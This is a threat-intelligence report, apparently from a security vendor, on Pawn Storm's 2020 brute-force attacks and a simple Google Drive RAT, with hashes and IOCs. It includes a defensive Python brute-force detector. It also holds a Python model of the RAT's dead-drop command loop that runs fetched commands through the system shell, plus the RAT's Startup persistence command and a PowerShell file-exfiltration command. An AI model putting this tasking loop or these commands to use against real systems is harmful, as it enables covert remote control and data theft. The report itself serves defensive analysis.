pawn storm

THE UNSOPHISTICATED ATTACK STRATEGY OF THE HACKER GROUP PAWN STORM

In this entry, we share Pawn Storm's recent activities, focusing on its use of simple methods that are not normally associated with APT groups.

Defenders who find a simple remote access Trojan (RAT) in their network will not immediately assume it came from an advanced persistent threat (APT) actor. Similarly, brute-force attacks on Internet-facing services (such as email, Microsoft Autodiscover, SMB, LDAP, and SQL) are so common that they look like negligible background noise. Yet in 2020 Pawn Storm, an infamous APT actor, deliberately used these uncomplicated methods, presumably so that its attacks would get lost in that noise.

In 2020, Pawn Storm distributed simple Google Drive and IMAP remote access Trojans (RATs) against its usual targets: ministries of foreign affairs, embassies, the defense industry, and the military. The RATs were also sent to a broader range of target networks across various industries worldwide. The group also carried out extensive brute-force attacks to steal credentials, including those of corporate email accounts. We attribute these attacks to Pawn Storm based on our own online investigation and on the actor's careless reuse of the compromised email accounts, both inside its malware and for sending spear-phishing emails. Pawn Storm even hard-coded military- and government-related email addresses into its IMAP RAT as the channel for communicating with victim computers. Recently, the Norwegian authorities announced that Pawn Storm had compromised the Norwegian Parliament through brute-force attacks.

Incremental improvements in subsequent versions of the malware hint at a learning curve for its author, which is more typical of less experienced actors than of advanced ones. For example, the first RAT version was so simple that it did not account for international keyboards, which made it hard for the attacker to enumerate a victim's hard drive when file and folder names contained international characters. The bug was fixed quickly, but it shows that this particular operator is relatively inexperienced. Later versions of the RAT began to use encryption, something that could have been built in from the start. The only secondary payload we observed was a simple keylogger that stored the stolen keystrokes locally on the victim's machine.

Based on the samples alone, it is difficult to attribute this malware to Pawn Storm; most cyber defenders would not attribute it to an APT actor at all. However, based on our long-term monitoring of the group's activities, we attribute these samples to Pawn Storm with high confidence.

Review of recent activities

Compromised accounts of users in the Middle East

Trend Micro has been closely and continuously monitoring the activities of Pawn Storm. We published our latest research on the group in March 2020. In that paper, we showed that Pawn Storm heavily abused stolen email accounts (mainly in the Middle East) to send spear-phishing emails. The abuse of compromised email accounts in the Middle East continued throughout 2020. For example, in early December 2020, the group used a VPN service to connect to a compromised cloud server, used that server to connect to a commercial email service provider, logged into the compromised email account of a chicken farm in Oman, and from there sent credential-phishing spam to high-profile targets around the world. This shows that Pawn Storm carefully obscures its tracks on multiple levels.

The abuse of various compromised email accounts in the Middle East began in May 2019 and continues to this day. Since August 2020, the group no longer uses these accounts only to send spear-phishing emails; it also uses them as the channel through which its IMAP RAT communicates with compromised systems.

Brute-force attacks

We believe that Pawn Storm compromises many email accounts through brute-force attacks on Internet-facing services such as email, LDAP, Microsoft Autodiscover, SMB, and SQL. For example, in May 2020, Pawn Storm scanned IP addresses worldwide, including those of the European defense industry, on TCP ports 445 and 1433, presumably to find vulnerable SMB and SQL servers or to brute-force their credentials. In August 2020, Pawn Storm also sent UDP probes from one of its dedicated IP addresses to LDAP servers around the world.

In 2020, Pawn Storm usually tried to hide these brute-force attempts by routing the attack traffic through Tor and VPN servers. This is not always enough to conceal the activity, however. In an article on the brute forcing of Office 365 credentials through Tor, Microsoft attributed the activity to Strontium, another name for Pawn Storm. We wrote about the same attacks in early 2020. These brute-force attacks started in 2019, and we can firmly attribute them to Pawn Storm because we were able to cross-correlate extensive detections on Microsoft Autodiscover servers worldwide with high-confidence indicators from the group's more traditional attack methods (spear phishing and credential phishing).
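The detections described in this section boil down to one source IP producing many failed logins against Autodiscover in a short time, either against many accounts (a spray) or against one. The script below is an added example written for this page, not Trend Micro's tooling or anything recovered from the campaign. It runs over a few constructed log lines in an assumed "date time src_ip user uri status" layout (real IIS or Exchange logs need their own parser), and the thresholds and the "known Tor exit" enrichment set are assumptions chosen for illustration.

```python
"""Spot brute-force and password-spraying attempts against Microsoft Autodiscover."""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, NamedTuple


class AuthEvent(NamedTuple):
    ts: datetime
    src_ip: str
    user: str
    uri: str
    status: int


def parse_line(line: str) -> AuthEvent:
    """Parse one line in the assumed layout 'YYYY-mm-dd HH:MM:SS src_ip user uri status'."""
    date, time, src_ip, user, uri, status = line.split()
    return AuthEvent(datetime.fromisoformat(f"{date}T{time}"), src_ip, user, uri, int(status))


def detect_autodiscover_bruteforce(
    lines: List[str],
    window: timedelta = timedelta(minutes=10),
    min_failures: int = 6,
    min_users: int = 4,
    tor_exits: frozenset = frozenset(),
) -> Dict[str, dict]:
    """One alert per source IP with >= min_failures 401s on /autodiscover/ inside `window`.
    Many distinct users from one IP means a password spray; one user hammered
    repeatedly means a classic brute force. Thresholds are assumptions."""
    failures = [
        e for e in (parse_line(l) for l in lines if l.strip())
        if e.status == 401 and e.uri.lower().startswith("/autodiscover/")
    ]
    by_ip: Dict[str, List[AuthEvent]] = defaultdict(list)
    for e in failures:
        by_ip[e.src_ip].append(e)

    alerts: Dict[str, dict] = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e.ts)
        start = 0
        for end in range(len(evs)):
            while evs[end].ts - evs[start].ts > window:   # slide the window forward
                start += 1
            if end - start + 1 >= min_failures:
                users = {e.user for e in evs}
                alerts[ip] = {
                    "kind": "password_spray" if len(users) >= min_users else "single_account_bruteforce",
                    "failures": len(evs),
                    "distinct_users": len(users),
                    "via_tor": ip in tor_exits,   # Tor/VPN routing is what the actor relies on
                    "first_seen": evs[0].ts.isoformat(),
                }
                break
    return alerts


# Constructed sample log (not real data): one spraying host, one user who mistyped
# a password once, and one host hammering a single mailbox from a Tor exit.
SAMPLE_LOG = """\
2020-05-03 10:00:01 198.51.100.7 alice@example.org /autodiscover/autodiscover.xml 401
2020-05-03 10:00:09 198.51.100.7 bob@example.org /autodiscover/autodiscover.xml 401
2020-05-03 10:00:17 198.51.100.7 carol@example.org /autodiscover/autodiscover.xml 401
2020-05-03 10:00:25 198.51.100.7 dave@example.org /autodiscover/autodiscover.xml 401
2020-05-03 10:00:33 198.51.100.7 erin@example.org /autodiscover/autodiscover.xml 401
2020-05-03 10:00:41 198.51.100.7 frank@example.org /autodiscover/autodiscover.xml 401
2020-05-03 10:00:49 198.51.100.7 grace@example.org /autodiscover/autodiscover.xml 401
2020-05-03 10:00:57 198.51.100.7 heidi@example.org /autodiscover/autodiscover.xml 401
2020-05-03 10:02:00 203.0.113.9 ivan@example.org /autodiscover/autodiscover.xml 401
2020-05-03 10:02:20 203.0.113.9 ivan@example.org /autodiscover/autodiscover.xml 200
2020-05-03 11:30:00 192.0.2.44 admin@example.org /autodiscover/autodiscover.xml 401
2020-05-03 11:30:05 192.0.2.44 admin@example.org /autodiscover/autodiscover.xml 401
2020-05-03 11:30:10 192.0.2.44 admin@example.org /autodiscover/autodiscover.xml 401
2020-05-03 11:30:15 192.0.2.44 admin@example.org /autodiscover/autodiscover.xml 401
2020-05-03 11:30:20 192.0.2.44 admin@example.org /autodiscover/autodiscover.xml 401
2020-05-03 11:30:25 192.0.2.44 admin@example.org /autodiscover/autodiscover.xml 401
2020-05-03 11:30:30 192.0.2.44 admin@example.org /autodiscover/autodiscover.xml 401
2020-05-03 11:40:00 192.0.2.44 admin@example.org /ews/exchange.asmx 401
"""

KNOWN_TOR_EXITS = frozenset({"192.0.2.44"})   # constructed enrichment list, not a real exit


def demo() -> Dict[str, dict]:
    return detect_autodiscover_bruteforce(SAMPLE_LOG.splitlines(), tor_exits=KNOWN_TOR_EXITS)


if __name__ == "__main__":
    for ip, alert in demo().items():
        print(ip, alert)
```

The split between "spray" and "single account" matters in practice: a spray against many users rarely trips per-account lockout, so per-source counting is the only view that catches it, while the single-account pattern is what the Norwegian Parliament-style intrusions look like from the server side.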

To illustrate the simplicity of the malware used in Pawn Storm's recent spear-phishing attacks, we walk through the following example.

Technical analysis of Google Drive RAT

Figure 1. Spear-phishing email from Pawn Storm, collected in August 2020

Starting in August 2020, Pawn Storm sent several spear-phishing emails with malicious RAR attachments. The earliest samples we received were two almost identical RAR files, each containing a file called info.exe. Both versions of info.exe are self-extracting archives (SFX) that drop and execute two files, crypto.exe and gdrive.exe:

c4a61b581890f575ba0586cf6d7d7d3e0c7603ca40915833d6746326685282b7 (info.exe) drops:

  • crypto.exe – 661d4a0d877bac9b813769a85c01bce274a77b29ccbd4b71e5b92df3c425b93b
  • gdrive.exe – cbd9cb7b69f864ce8bae983ececb7cf8627f9c17fdaba74bd39baa5cdf605f79

3fd45b9b33ff5b6363ba0013178572723b0a912deb8235a951aa3f0aa3142509 (info.exe) drops:

  • crypto.exe – 661d4a0d877bac9b813769a85c01bce274a77b29ccbd4b71e5b92df3c425b93b
  • gdrive.exe – 2060f1e108f5feb5790320c38931e3dc6c7224edf925bf6f1840351578bbf9cc

Decoy file

The file crypto.exe is a decoy that runs as soon as info.exe is executed. The application merely displays a message box asking the user to type a password for decryption. Examining its disassembly shows that all it does after a password is entered in the main window is display a second message box.

Figure 2-3. The message boxes displayed by crypto.exe

After this application is closed, the SFX archive executes gdrive.exe. The two versions of gdrive.exe are nearly identical; the only difference is that sample 2060f1e108f5feb5790320c38931e3dc6c7224edf925bf6f1840351578bbf9cc additionally base64-encodes the victim's ID (comp_id).

Figure 4. gdrive.exe code snippet showing comp_id

Figure 5. gdrive.exe code snippet showing comp_id and its base64 encoding

Initial run

The first thing the malware does is copy itself to the user's Startup directory to maintain persistence. It does this through cmd.exe with the following command:

  • move /Y "{malware_location}" "C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gdrive.exe"

Every time the malware runs a command through cmd.exe, the standard output (STDOUT) of that command is captured and written to the attacker's Google Drive account under a file name of the following form:

  • {utcnow}_report_{victim's ID}

Figure 6. Code snippet showing command execution

The client secret and token used to read from and write to the attacker's Google Drive account are hard-coded in the malware itself.

Figure 7-8. Code snippets showing the hard-coded client secret and token

By sending this information through Google Drive, the attacker can check whether the computer running the malware belongs to the intended target.

Receiving commands and exfiltrating data

The bot checks the files in the Google Drive account every 20 minutes. If a file whose name matches the format cmd_{victim's ID} is present, the bot downloads it and runs its content as a batch file.

Figure 9. Code snippet showing the wait for a command

As before, the STDOUT of the command is written back to Google Drive. Using Google Drive as the command-and-control (C&C) server in this way effectively gives the attacker a reverse shell.

The command file the bot fetches from Google Drive is deleted as soon as it has been downloaded.
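The whole exchange (tasking file named after the victim ID, deletion on download, STDOUT uploaded under a timestamped report name) fits in a few dozen lines, which is the point of this section. The model below is an added example written for this page, not code from the malware or from Trend Micro. FakeDrive stands in for the attacker's Drive account so nothing touches the network, the timestamp layout and the executor hook are assumptions, the 20-minute poll interval is left to the caller, and the comp_id value is constructed.

```python
"""Offline model of the Google Drive dead-drop C&C used by gdrive.exe."""
import base64
import subprocess
from datetime import datetime, timezone
from typing import Callable, Dict, List, Optional, Tuple


class FakeDrive:
    """In-memory stand-in for the Drive account that the hard-coded token unlocks."""

    def __init__(self) -> None:
        self.files: Dict[str, str] = {}

    def list_names(self) -> List[str]:
        return sorted(self.files)

    def upload(self, name: str, content: str) -> None:
        self.files[name] = content

    def download(self, name: str) -> str:
        return self.files[name]

    def delete(self, name: str) -> None:
        del self.files[name]


def make_victim_id(comp_id: str, base64_encode: bool) -> str:
    """Sample 2060f1e1... base64-encodes comp_id before using it in file names."""
    return base64.b64encode(comp_id.encode()).decode() if base64_encode else comp_id


def run_batch(batch: str) -> str:
    """Default executor: run the tasking through the system shell and capture STDOUT,
    mirroring the RAT's cmd.exe pipe. Swap in a stub when replaying in a sandbox."""
    return subprocess.run(batch, shell=True, capture_output=True, text=True).stdout


def bot_poll_once(
    drive: FakeDrive,
    victim_id: str,
    executor: Callable[[str], str] = run_batch,
    now: Optional[datetime] = None,
) -> Optional[str]:
    """One iteration of the bot's polling loop. Returns the name of the report it
    uploaded, or None when no tasking was waiting."""
    now = now or datetime.now(timezone.utc)
    cmd_name = f"cmd_{victim_id}"
    if cmd_name not in drive.list_names():
        return None
    batch = drive.download(cmd_name)
    drive.delete(cmd_name)                      # tasking is removed right after download
    report_name = f"{now:%Y%m%d%H%M%S}_report_{victim_id}"   # assumed timestamp layout
    drive.upload(report_name, executor(batch))  # STDOUT goes back through the same account
    return report_name


def operator_task(drive: FakeDrive, victim_id: str, batch: str) -> None:
    """Operator side: queue a batch script for one victim."""
    drive.upload(f"cmd_{victim_id}", batch)


def operator_collect(drive: FakeDrive, victim_id: str) -> Dict[str, str]:
    """Operator side: pull every report a given victim has uploaded."""
    suffix = f"_report_{victim_id}"
    return {n: drive.download(n) for n in drive.list_names() if n.endswith(suffix)}


def demo() -> Tuple[str, Optional[str], str, List[str]]:
    """Full round trip with a fixed clock: task 'echo pawn', poll once, collect."""
    drive = FakeDrive()
    vid = make_victim_id("WS01-4711", base64_encode=True)   # constructed comp_id
    operator_task(drive, vid, "echo pawn")
    report = bot_poll_once(drive, vid, now=datetime(2020, 8, 1, 12, 0, tzinfo=timezone.utc))
    output = operator_collect(drive, vid).get(report or "", "").strip()
    return vid, report, output, drive.list_names()


if __name__ == "__main__":
    print(demo())
```

Two things stand out once the flow is written down: every victim's reports share one account, so a defender who obtains the token (it is hard-coded) can enumerate the whole victim set from the report names, and the delete-on-download step means only the operator's reports, not the tasking, survive for later analysis.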

Figure 10. Code snippet showing readFile

Using the reverse shell described above, the attacker can exfiltrate data and documents with commands such as:

  • powershell -command "[Convert]::ToBase64String([IO.File]::ReadAllBytes('(unknown)'))"

Figure 11. Code snippet showing data exfiltration

The secondary payload, a file named Google Drivemonitor.exe (0b94e123f6586967819fa247cdd58779b1120ef93fa1ea1de70dffc898054a09), is a keylogger. The collected keystrokes are stored in the same directory as the running malware.

Figure 12. Code snippet showing the keylogging routine

This secondary payload has no functionality of its own to upload the collected keystrokes to the attacker. However, because the main malware acts as a reverse shell, the attacker can retrieve the keystroke log at a later time.

Eventually, the threat actors improved the malware, for example by adding encryption. Later, they also started to use the IMAP RAT.

IOCs

34.243.239[.]199
74.208.228[.]186
193.56.28[.]25
195.191.235[.]155

280c8557eb45d5fee4a4663f5db5dcaf
934dad8c091622cd6fe9907104bc73ab
dae8e4a606dac20b755b1a553acbaf16
b711ade716c30f83d7631ac00bf754dd
f91d037d8686fbee12b984d2a8fd344c
0a0355d5fad8c5437ea79f56db152274
bc2866c331d58d255b4e7e95db928a43
d256798ac5b5b60a31d52b8e8281bc77
96bb5d48c7b991175ac38f8699ed4012
6d8ec301bff06bc347540f286587629e
2b8047743f3c70c8be106bb795ed6e9d
0fd132d93fd85b4668a97295cc6c7737
a5f3883d1f3d0072d316df9411694fb2
980d6d0cca3aad0000083d428d3e791d
74b83a7ff32d0a4926798431bed12ab2
23e7001d1ac560e55f4a260b18a8fec8be40d840
052237ccb7f42c07c861fe5e7c2a7b2c1bba1491
4a08ac71aab4687baa6e3f97bdb770ff791be6e7
59f1151b7370cd5be7489a7d9246469d21f460fe
9477b9158acf9775ae1bd4b2d594c06c6abf8b8c
a5124396ddcb855a4777c0d95645faeeb6d6b2e4
8a101cf72730bbd0f44207055602d95784f73331
2c7559d6f1659712f44b1a034f5e67c590c06f08
929f4d9d05c963211ca11a45c33b26b96f7b6570
3d6c208b796b4a86ffc998393c53c1ea91821421
d489d6bae8319a9c22ad3fb217c05e09f7bc9ae3
7f68deaa89959c6940d2f54b12098f8ea6eb0535
54ede8a3824dfeb42dd18f194e3130778e6c7235
89443c0a78fd0d11c1c43d9ca2e33088ac093a7a
7e0735f1cc9fbfc4c990011ffc91762c969a6d07